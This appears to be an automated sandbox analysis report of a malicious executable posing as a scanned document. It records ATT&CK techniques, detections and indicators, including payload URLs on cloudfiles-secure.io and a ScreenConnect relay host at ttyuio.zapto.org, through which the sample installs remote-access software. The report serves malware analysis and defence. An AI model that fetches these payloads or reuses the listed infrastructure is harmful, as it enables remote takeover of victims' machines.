                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe - Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: Yara match - File source: 10.0.ScreenConnect.WindowsClient.exe.ff0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match - File source: 0000000A.00000002.2285819740.000000001BC56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match - File source: 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match - File source: 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match - File source: 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara match - File source: 0000000A.00000002.2284680562.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match - File source: Process Memory Space: dfsvc.exe PID: 1196, type: MEMORYSTR
                  Source: Yara match - File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7664, type: MEMORYSTR
                  Source: Yara match - File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7700, type: MEMORYSTR
                  Source: Yara match - File source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 31 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 11 Native API | 1 DLL Search Order Hijacking | 1 DLL Search Order Hijacking | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 2 Windows Service | 2 Windows Service | 1 Install Root Certificate | Security Account Manager | 65 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 13 Process Injection | 1 Timestomp | NTDS | 71 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 1 Scheduled Task/Job | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Search Order Hijacking | Cached Domain Credentials | 71 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 71 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 13 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Hidden Users | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
| Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Bootkit | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |

[Behavior graph: ID 1523878, Sample: Scan_doc_09_16_24_1120.exe, Startdate: 02/10/2024, Architecture: WINDOWS, Score: 66]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| Scan_doc_09_16_24_1120.exe | 14% | Virustotal | | Browse |
| Scan_doc_09_16_24_1120.exe | 18% | ReversingLabs | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | | |

                  No Antivirus matches
                  No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://g.live.com/odclientsettings/ProdV2.C: | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/02/trust | 0% | URL Reputation | safe | |
| http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 0% | URL Reputation | safe | |
| http://upx.sf.net | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/02/trust/Issue | 0% | URL Reputation | safe | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| cloudfiles-secure.io | 178.215.236.119 | true | true | | unknown |
| fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown |
| ttyuio.zapto.org | 178.215.236.119 | true | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exe | true | | unknown |
| https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe.config | true | | unknown |
| https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest | true | | unknown |
| https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.config | true | | unknown |
| https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.config | true | | unknown |
| https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe | true | | unknown |
| https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe | true | | unknown |
| https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dll | true | | unknown |
| https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dll | true | | unknown |

Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest1dfsvc.exe, 00000001.00000002.2792984032.0000022721B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.w3.oraScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000157A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceQuery.srfUsvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://Passport.NET/STSsvchost.exe, 00000007.00000003.2156243757.0000022265375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165857970.0000022265379000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2156320828.0000022265374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165831029.0000022265376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.2784738148.0000022707CF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationPNTScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.00000000014D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.w3.odfsvc.exe, 00000001.00000002.2784738148.0000022708125000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.oCHT0VHXS.log.1.drfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee2svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://Passport.NET/tbsvchost.exe, 00000007.00000002.3272552281.0000022265A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000007.00000003.2156243757.0000022265375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2190621904.0000022265378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272256168.0000022265378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2156320828.0000022265374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271328739.0000022264ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165831029.0000022265376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2078695040.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2168950175.0000022265375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2209823243.0000022265379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://signup.live.com/signup.aspxsvchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271914143.0000022265300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dllPjdfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationpps_ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000156C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000001.00000002.2784738148.0000022707CF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270802647.0000022264A27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationxdfsvc.exe, 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://login.live.csvchost.exe, 00000007.00000002.3270802647.0000022264A27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://login.microsoftonline.com/ppsecure/devicechangecredential.srfTokensvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/scstsvchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifesttdfsvc.exe, 00000001.00000002.2794432679.0000022721CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfUsvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 00000007.00000002.3272552281.0000022265A67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://g.live.com/odclientsettings/Prod/C:edb.log.6.drfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 00000007.00000003.2056321735.000002226532C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/sc1esvchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://cloudfiles-secure.iodfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270845D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2794636681.0000022723FB5000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://cloudfiles-secure.io/Bin/ScreenConnect.Windfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://cloudfiles-secure.io/Bin/ScreenConnect.ClientServidfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
IP: 178.215.236.119
Domain: cloudfiles-secure.io
Country: Germany
ASN: 10753
ASN Name: LVLT-10753US
Malicious: true
                                                                                                                                                                                                            IP
                                                                                                                                                                                                            127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1523878
Start date and time: 2024-10-02 06:22:00 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Scan_doc_09_16_24_1120.exe
Detection: MAL
Classification: mal66.evad.winEXE@21/78@2/2
                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                            • Successful, ratio: 85.7%
                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                            • Successful, ratio: 57%
                                                                                                                                                                                                            • Number of executed functions: 188
                                                                                                                                                                                                            • Number of non-executed functions: 26
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 40.126.32.140, 40.126.32.72, 40.126.32.74, 40.126.32.68, 20.190.160.17, 40.126.32.76, 40.126.32.138, 20.190.160.20, 2.19.126.137, 2.19.126.163, 192.229.221.95, 184.28.90.27, 20.42.65.92, 93.184.221.240
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                            • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 7700 because it is empty
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
00:22:49  API Interceptor  12849x Sleep call for process: dfsvc.exe modified
00:22:49  API Interceptor  1x Sleep call for process: Scan_doc_09_16_24_1120.exe modified
00:22:50  API Interceptor  2x Sleep call for process: svchost.exe modified
00:23:08  API Interceptor  1x Sleep call for process: WerFault.exe modified
06:22:41  Task Scheduler   Run new task: {5837ECB1-20BB-4273-AE75-0A2B20C8D8BD} path: .
                                                                                                                                                                                                                                s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                Ge1x3MBwf4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                tr5jscSEwo.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eD0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
